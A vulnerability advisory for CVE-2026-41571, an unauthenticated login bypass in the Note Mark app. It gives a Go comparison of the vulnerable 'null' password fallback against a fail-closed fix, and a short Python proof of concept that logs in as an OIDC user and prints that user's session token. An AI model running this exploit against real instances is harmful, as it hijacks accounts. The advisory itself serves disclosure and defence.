Security Vulnerability Report
CVE-2026-41571 (CVSS 9.4, CRITICAL)

Published: 2026-05-04 18:16:30
Last Modified: 2026-05-06 21:25:49

Description

Note Mark is an open-source note-taking application. In version 0.19.2, IsPasswordMatch in backend/db/models.go falls back to a hard-coded bcrypt("null") placeholder whenever a user has no stored password. OIDC-registered users are created with an empty password, so anyone who submits password: "null" to the internal login endpoint receives a valid session for that user. The bypass is unauthenticated and requires no user interaction. This issue has been patched in version 0.19.3.
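The fallback described above, shown beside a fail-closed version, as an added illustration in Go that is not Note Mark's own code. It assumes a minimal User type, and uses SHA-256 with a constant-time compare as a stand-in for bcrypt so that it runs on the standard library alone; the function names IsPasswordMatchVulnerable and IsPasswordMatchFixed are this example's own.

```go
package main

import (
	"crypto/sha256"
	"crypto/subtle"
	"fmt"
)
// hashPassword/checkHash stand in for bcrypt so this runs on the standard library
// alone (an assumption of this example; Note Mark itself uses bcrypt).
func hashPassword(pw string) []byte {
	sum := sha256.Sum256([]byte(pw))
	return sum[:]
}
func checkHash(hash []byte, pw string) bool {
	return subtle.ConstantTimeCompare(hash, hashPassword(pw)) == 1
}

// nullPlaceholder models the hard-coded bcrypt("null") hash named in the advisory.
var nullPlaceholder = hashPassword("null")
// User is a minimal stand-in for the model; OIDC-registered accounts have an empty Password.
type User struct {
	Username string
	Password []byte
}

// IsPasswordMatchVulnerable reproduces the 0.19.2 logic: an empty stored hash
// is silently swapped for the placeholder, so submitting "null" authenticates.
func IsPasswordMatchVulnerable(u User, pw string) bool {
	stored := u.Password
	if len(stored) == 0 {
		stored = nullPlaceholder
	}
	return checkHash(stored, pw)
}

// IsPasswordMatchFixed fails closed: an account with no stored hash cannot
// log in with a password at all, whatever the caller submits.
func IsPasswordMatchFixed(u User, pw string) bool {
	if len(u.Password) == 0 {
		return false
	}
	return checkHash(u.Password, pw)
}

func main() {
	oidc := User{Username: "alice"} // constructed sample OIDC account, no password set
	fmt.Println("vulnerable accepts \"null\":", IsPasswordMatchVulnerable(oidc, "null")) // true
	fmt.Println("fixed accepts \"null\":", IsPasswordMatchFixed(oidc, "null"))           // false
}
```

The same fail-closed rule applies to any account created by an external identity provider: a missing credential must never be replaced by a default one.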

CVSS Details

CVSS Score: 9.4
Severity: CRITICAL
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:L

Configurations (Affected Products)

No configuration data available.

Note Mark 0.19.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests

# Target URL for the internal login endpoint
target_url = "http://target-note-mark-url/api/login"

# Payload data
# OIDC users have empty passwords, but the app compares input against bcrypt("null")
payload = {
    "username": "victim_oidc_user",  # Username of the OIDC registered user
    "password": "null"  # Hardcoded fallback password
}

# Send POST request
response = requests.post(target_url, json=payload)

# Check if login was successful (HTTP 200 OK and session token)
if response.status_code == 200 and "session" in response.json():
    print("[+] Exploit successful! Account bypassed.")
    print(f"[+] Session token: {response.json().get('session')}")
else:
    print("[-] Exploit failed.")

References

https://github.com/enchant97/note-mark/releases/tag/v0.19.3
https://github.com/enchant97/note-mark/security/advisories/GHSA-pxf8-6wqm-r6hh

Weakness

CWE-287 (Improper Authentication)

Status

NVD record status: Deferred